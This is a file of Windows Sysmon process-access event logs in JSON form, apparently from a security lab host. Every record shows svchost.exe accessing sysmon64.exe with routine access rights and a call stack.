{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4881,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4882,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4883,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4884,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4885,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4886,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4887,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4888,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.593\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.593","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
